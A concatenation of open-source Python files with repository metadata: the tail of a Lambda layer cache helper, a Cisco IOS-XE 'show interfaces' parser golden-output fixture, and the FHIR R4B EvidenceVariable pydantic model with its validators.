# If it was not 'AccessDeniedException' or 'ResourceNotFoundException' re-raise
raise e
return layer_version_response.get("Content").get("Location")
@staticmethod
def _is_layer_cached(layer_path: Path) -> bool:
"""
Checks if the layer is already cached on the system
Parameters
----------
layer_path Path
Path to where the layer should exist if cached on the system
Returns
-------
bool
True if the layer_path already exists otherwise False
"""
return layer_path.exists()
@staticmethod
def _create_cache(layer_cache):
"""
Create the Cache directory if it does not exist.
Parameters
----------
layer_cache
Directory to where the layers should be cached
"""
Path(layer_cache).mkdir(mode=0o700, parents=True, exist_ok=True)
|
556c7237e6bd357fdaaa314c0d80b7c1616125da
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/iosxe/tests/ShowInterfaces/cli/equal/golden_output_2_expected.py
|
e7883907e661cfd76e8ee83a1c45a910567f3017
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 10,343
|
py
|
golden_output_2_expected.py
|
expected_output = {
"TenGigabitEthernet0/1/0": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 7,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 5592817,
"in_no_buffer": 0,
"in_octets": 146338033143374,
"in_overrun": 0,
"in_pkts": 173550579294,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 2,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 16525140785118,
"out_pkts": 39328190625,
"out_underruns": 0,
"out_unknown_protocl_drops": 0,
"rate": {
"in_rate": 49998000,
"in_rate_pkts": 6546,
"load_interval": 300,
"out_rate": 8598000,
"out_rate_pkts": 1638,
},
},
"delay": 10,
"duplex_mode": "full",
"enabled": True,
"is_deleted": False,
"encapsulations": {"encapsulation": "arpa"},
"flow_control": {"receive": True, "send": True},
"ipv4": {"10.209.98.103/31": {"ip": "10.209.98.103", "prefix_length": "31"}},
"last_input": "02:29:25",
"last_output": "02:29:25",
"line_protocol": "up",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa19",
"media_type": "SFP-LR",
"mtu": 4000,
"oper_status": "up",
"output_hang": "never",
"phys_address": "2c33.11ff.fa19",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 0,
"input_queue_flushes": 0,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "fifo",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
"TenGigabitEthernet0/1/1": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 98185589,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 96415788,
"in_no_buffer": 0,
"in_octets": 107581463084138,
"in_overrun": 0,
"in_pkts": 112310736139,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 2,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 174533887805,
"out_pkts": 1539949004,
"out_underruns": 0,
"out_unknown_protocl_drops": 81113,
"rate": {
"in_rate": 24128000,
"in_rate_pkts": 2898,
"load_interval": 300,
"out_rate": 104000,
"out_rate_pkts": 122,
},
},
"delay": 10,
"description": "Internet OUT Link (Through ASA or Direct)",
"duplex_mode": "full",
"enabled": True,
"is_deleted": False,
"encapsulations": {"encapsulation": "dot1q", "first_dot1q": "1"},
"flow_control": {"receive": True, "send": True},
"last_input": "00:00:00",
"last_output": "00:00:00",
"line_protocol": "up",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa1a",
"media_type": "SFP-LR",
"mtu": 1500,
"oper_status": "up",
"output_hang": "never",
"phys_address": "2c33.11ff.fa1a",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 1873,
"input_queue_flushes": 1370,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "Class-based",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
"TenGigabitEthernet0/1/5": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 0,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 0,
"in_no_buffer": 0,
"in_octets": 0,
"in_overrun": 0,
"in_pkts": 0,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 1,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 0,
"out_pkts": 0,
"out_underruns": 0,
"out_unknown_protocl_drops": 0,
"rate": {
"in_rate": 0,
"in_rate_pkts": 0,
"load_interval": 300,
"out_rate": 0,
"out_rate_pkts": 0,
},
},
"delay": 10,
"duplex_mode": "full",
"enabled": False,
"is_deleted": False,
"encapsulations": {"encapsulation": "arpa"},
"flow_control": {"receive": False, "send": False},
"last_input": "never",
"last_output": "never",
"line_protocol": "down",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa1e",
"media_type": "unknown",
"mtu": 1500,
"oper_status": "down",
"output_hang": "never",
"phys_address": "2c33.11ff.fa1e",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 0,
"input_queue_flushes": 0,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "fifo",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
"TenGigabitEthernet0/1/6": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 0,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 0,
"in_no_buffer": 0,
"in_octets": 0,
"in_overrun": 0,
"in_pkts": 0,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 1,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 0,
"out_pkts": 0,
"out_underruns": 0,
"out_unknown_protocl_drops": 0,
"rate": {
"in_rate": 0,
"in_rate_pkts": 0,
"load_interval": 300,
"out_rate": 0,
"out_rate_pkts": 0,
},
},
"delay": 10,
"duplex_mode": "full",
"enabled": False,
"is_deleted": False,
"encapsulations": {"encapsulation": "arpa"},
"flow_control": {"receive": False, "send": False},
"last_input": "never",
"last_output": "never",
"line_protocol": "down",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa1f",
"media_type": "unknown",
"mtu": 1500,
"oper_status": "down",
"output_hang": "never",
"phys_address": "2c33.11ff.fa1f",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 0,
"input_queue_flushes": 0,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "fifo",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
}
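# --- Hedged usage sketch (editor's addition) ---
# Golden-output modules like this one are imported by the parser unit tests and
# compared against freshly parsed device output, roughly along these lines
# (test-harness details are assumptions, not shown in this file):
#
# >>> parsed_output = ShowInterfaces(device=device).parse()
# >>> assert parsed_output == expected_output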
| c66ebc70c8f53427c2f9cd46185ed9496bc65936 | fdb9bdc6c4ab2f14ba71e544493706d5e275899f | /fhir/resources/R4B/evidencevariable.py | 248c00c2229c3e04c42ccc77d988e217a00ed883 | ["BSD-3-Clause"] | permissive | nazrulworld/fhir.resources | 6ae8aea8180c611b0c5050759c6dcdf63e4cb061 | 1fd6ea476b27b3fcb8c4ef8f23bc51cf161e69e3 | refs/heads/main | 2023-08-30T18:27:27.277249 | 2023-07-03T19:57:06 | 2023-07-03T19:57:06 | 165,297,877 | 256 | 83 | NOASSERTION | 2023-08-24T15:34:05 | 2019-01-11T19:26:41 | Python | UTF-8 | Python | false | false | 34,996 | py | evidencevariable.py |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/EvidenceVariable
Release: R4B
Version: 4.3.0
Build ID: c475c22
Last updated: 2022-05-28T12:47:40.239+10:00
"""
import typing
from pydantic import Field, root_validator
from pydantic.error_wrappers import ErrorWrapper, ValidationError
from pydantic.errors import MissingError, NoneIsNotAllowedError
from . import backboneelement, domainresource, fhirtypes
class EvidenceVariable(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A definition of an exposure, outcome, or other variable.
The EvidenceVariable resource describes an element that knowledge
(Evidence) is about.
"""
resource_type = Field("EvidenceVariable", const=True)
actual: bool = Field(
None,
alias="actual",
title="Actual or conceptual",
description=(
"True if the actual variable measured, false if a conceptual "
"representation of the intended variable."
),
# if property is element of this resource.
element_property=True,
)
actual__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_actual", title="Extension field for ``actual``."
)
author: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="author",
title="Who authored the content",
description=(
"An individiual or organization primarily involved in the creation and "
"maintenance of the content."
),
# if property is element of this resource.
element_property=True,
)
category: typing.List[fhirtypes.EvidenceVariableCategoryType] = Field(
None,
alias="category",
title="A grouping for ordinal or polychotomous variables",
description=(
"A grouping (or set of values) described along with other groupings to "
"specify the set of groupings allowed for the variable."
),
# if property is element of this resource.
element_property=True,
)
characteristic: typing.List[fhirtypes.EvidenceVariableCharacteristicType] = Field(
None,
alias="characteristic",
title="What defines the members of the evidence element",
description=(
"A characteristic that defines the members of the evidence element. "
'Multiple characteristics are applied with "and" semantics.'
),
# if property is element of this resource.
element_property=True,
)
characteristicCombination: fhirtypes.Code = Field(
None,
alias="characteristicCombination",
title="intersection | union",
description=(
"Used to specify if two or more characteristics are combined with OR or"
" AND."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["intersection", "union"],
)
characteristicCombination__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_characteristicCombination",
title="Extension field for ``characteristicCombination``.",
)
contact: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the evidence variable was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the evidence variable changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the evidence variable",
description=(
"A free text natural language description of the evidence variable from"
" a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
editor: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="editor",
title="Who edited the content",
description=(
"An individual or organization primarily responsible for internal "
"coherence of the content."
),
# if property is element of this resource.
element_property=True,
)
endorser: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="endorser",
title="Who endorsed the content",
description=(
"An individual or organization responsible for officially endorsing the"
" content for use in some setting."
),
# if property is element of this resource.
element_property=True,
)
handling: fhirtypes.Code = Field(
None,
alias="handling",
title="continuous | dichotomous | ordinal | polychotomous",
description="Used for an outcome to classify.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["continuous", "dichotomous", "ordinal", "polychotomous"],
)
handling__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_handling", title="Extension field for ``handling``."
)
identifier: typing.List[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the evidence variable",
description=(
"A formal identifier that is used to identify this evidence variable "
"when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Name for this evidence variable (computer friendly)",
description=(
"A natural language name identifying the evidence variable. This name "
"should be usable as an identifier for the module by machine processing"
" applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
note: typing.List[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Used for footnotes or explanatory notes",
description=(
"A human-readable string to clarify or explain concepts about the "
"resource."
),
# if property is element of this resource.
element_property=True,
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the evidence"
" variable."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
relatedArtifact: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="relatedArtifact",
title="Additional documentation, citations, etc.",
description=(
"Related artifacts such as additional documentation, justification, or "
"bibliographic references."
),
# if property is element of this resource.
element_property=True,
)
reviewer: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="reviewer",
title="Who reviewed the content",
description=(
"An individual or organization primarily responsible for review of some"
" aspect of the content."
),
# if property is element of this resource.
element_property=True,
)
shortTitle: fhirtypes.String = Field(
None,
alias="shortTitle",
title="Title for use in informal contexts",
description=(
"The short title provides an alternate title for use in informal "
"descriptive contexts where the full, formal title is not necessary."
),
# if property is element of this resource.
element_property=True,
)
shortTitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_shortTitle", title="Extension field for ``shortTitle``."
)
status: fhirtypes.Code = Field(
None,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this evidence variable. Enables tracking the life-cycle "
"of the content."
),
# if property is element of this resource.
element_property=True,
element_required=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
subtitle: fhirtypes.String = Field(
None,
alias="subtitle",
title="Subordinate title of the EvidenceVariable",
description=(
"An explanatory or alternate title for the EvidenceVariable giving "
"additional information about its content."
),
# if property is element of this resource.
element_property=True,
)
subtitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_subtitle", title="Extension field for ``subtitle``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this evidence variable (human friendly)",
description="A short, descriptive, user-friendly title for the evidence variable.",
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
url: fhirtypes.Uri = Field(
None,
alias="url",
title=(
"Canonical identifier for this evidence variable, represented as a URI "
"(globally unique)"
),
description=(
"An absolute URI that is used to identify this evidence variable when "
"it is referenced in a specification, model, design or an instance; "
"also called its canonical identifier. This SHOULD be globally unique "
"and SHOULD be a literal address at which at which an authoritative "
"instance of this evidence variable is (or will be) published. This URL"
" can be the target of a canonical reference. It SHALL remain the same "
"when the evidence variable is stored on different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: typing.List[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate evidence variable instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the evidence variable",
description=(
"The identifier that is used to identify this version of the evidence "
"variable when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the evidence variable "
"author and is not expected to be globally unique. For example, it "
"might be a timestamp (e.g. yyyymmdd) if a managed version is not "
"available. There is also no expectation that versions can be placed in"
" a lexicographical sequence. To provide a version consistent with the "
"Decision Support Service specification, use the format "
"Major.Minor.Revision (e.g. 1.0.0). For more information on versioning "
"knowledge assets, refer to the Decision Support Service specification."
" Note that a version is required for non-experimental active "
"artifacts."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariable`` according specification,
with preserving original sequence order.
"""
return [
"id",
"meta",
"implicitRules",
"language",
"text",
"contained",
"extension",
"modifierExtension",
"url",
"identifier",
"version",
"name",
"title",
"shortTitle",
"subtitle",
"status",
"date",
"description",
"note",
"useContext",
"publisher",
"contact",
"author",
"editor",
"reviewer",
"endorser",
"relatedArtifact",
"actual",
"characteristicCombination",
"characteristic",
"handling",
"category",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_1779(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("status", "status__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
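# --- Hedged usage sketch (editor's addition, not part of the generated module) ---
# Minimal construction of the pydantic model defined above. ``status`` is the
# only required primitive element; the root validator above also accepts a
# ``_status`` primitive extension in its place. Field values are illustrative.
#
# >>> ev = EvidenceVariable(status="draft", name="ExampleVariable", actual=True)
# >>> ev.status
# 'draft'
# >>> EvidenceVariable(name="missing-status")
# Traceback (most recent call last):
#     ...
# pydantic.error_wrappers.ValidationError: ...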
class EvidenceVariableCategory(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A grouping for ordinal or polychotomous variables.
A grouping (or set of values) described along with other groupings to
specify the set of groupings allowed for the variable.
"""
resource_type = Field("EvidenceVariableCategory", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="Description of the grouping",
description="A human-readable title or representation of the grouping.",
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
valueCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="valueCodeableConcept",
title="Definition of the grouping",
description="Value or set of values that define the grouping.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=False,
)
valueQuantity: fhirtypes.QuantityType = Field(
None,
alias="valueQuantity",
title="Definition of the grouping",
description="Value or set of values that define the grouping.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=False,
)
valueRange: fhirtypes.RangeType = Field(
None,
alias="valueRange",
title="Definition of the grouping",
description="Value or set of values that define the grouping.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=False,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariableCategory`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"name",
"valueCodeableConcept",
"valueQuantity",
"valueRange",
]
@root_validator(pre=True, allow_reuse=True)
def validate_one_of_many_2629(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"value": ["valueCodeableConcept", "valueQuantity", "valueRange"]
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
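# --- Hedged usage sketch (editor's addition) ---
# The validator above enforces the FHIR value[x] rule: at most one of
# valueCodeableConcept / valueQuantity / valueRange may be populated.
# Values are illustrative.
#
# >>> EvidenceVariableCategory(name="BMI 18.5-24.9",
# ...                          valueRange={"low": {"value": 18.5}, "high": {"value": 24.9}})
# >>> EvidenceVariableCategory(name="bad",
# ...                          valueQuantity={"value": 1},
# ...                          valueRange={"low": {"value": 0}})  # raises ValueError: two value[x] choices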
class EvidenceVariableCharacteristic(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
What defines the members of the evidence element.
A characteristic that defines the members of the evidence element. Multiple
characteristics are applied with "and" semantics.
"""
resource_type = Field("EvidenceVariableCharacteristic", const=True)
definitionCanonical: fhirtypes.Canonical = Field(
None,
alias="definitionCanonical",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Resource"],
)
definitionCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_definitionCanonical",
title="Extension field for ``definitionCanonical``.",
)
definitionCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="definitionCodeableConcept",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionExpression: fhirtypes.ExpressionType = Field(
None,
alias="definitionExpression",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionReference: fhirtypes.ReferenceType = Field(
None,
alias="definitionReference",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Group", "EvidenceVariable"],
)
description: fhirtypes.String = Field(
None,
alias="description",
title="Natural language description of the characteristic",
description=(
"A short, natural language description of the characteristic that could"
" be used to communicate the criteria to an end-user."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
device: fhirtypes.ReferenceType = Field(
None,
alias="device",
title="Device used for determining characteristic",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Device", "DeviceMetric"],
)
exclude: bool = Field(
None,
alias="exclude",
title="Whether the characteristic includes or excludes members",
description=(
"When true, members with this characteristic are excluded from the "
"element."
),
# if property is element of this resource.
element_property=True,
)
exclude__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_exclude", title="Extension field for ``exclude``."
)
groupMeasure: fhirtypes.Code = Field(
None,
alias="groupMeasure",
title=(
"mean | median | mean-of-mean | mean-of-median | median-of-mean | "
"median-of-median"
),
description=(
"Indicates how elements are aggregated within the study effective "
"period."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=[
"mean",
"median",
"mean-of-mean",
"mean-of-median",
"median-of-mean",
"median-of-median",
],
)
groupMeasure__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_groupMeasure", title="Extension field for ``groupMeasure``."
)
method: fhirtypes.CodeableConceptType = Field(
None,
alias="method",
title="Method used for describing characteristic",
description=None,
# if property is element of this resource.
element_property=True,
)
timeFromStart: fhirtypes.EvidenceVariableCharacteristicTimeFromStartType = Field(
None,
alias="timeFromStart",
title="Observation time from study start",
description=(
"Indicates duration, period, or point of observation from the "
"participant's study entry."
),
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariableCharacteristic`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"description",
"definitionReference",
"definitionCanonical",
"definitionCodeableConcept",
"definitionExpression",
"method",
"device",
"exclude",
"timeFromStart",
"groupMeasure",
]
@root_validator(pre=True, allow_reuse=True)
def validate_one_of_many_3226(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"definition": [
"definitionCanonical",
"definitionCodeableConcept",
"definitionExpression",
"definitionReference",
]
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
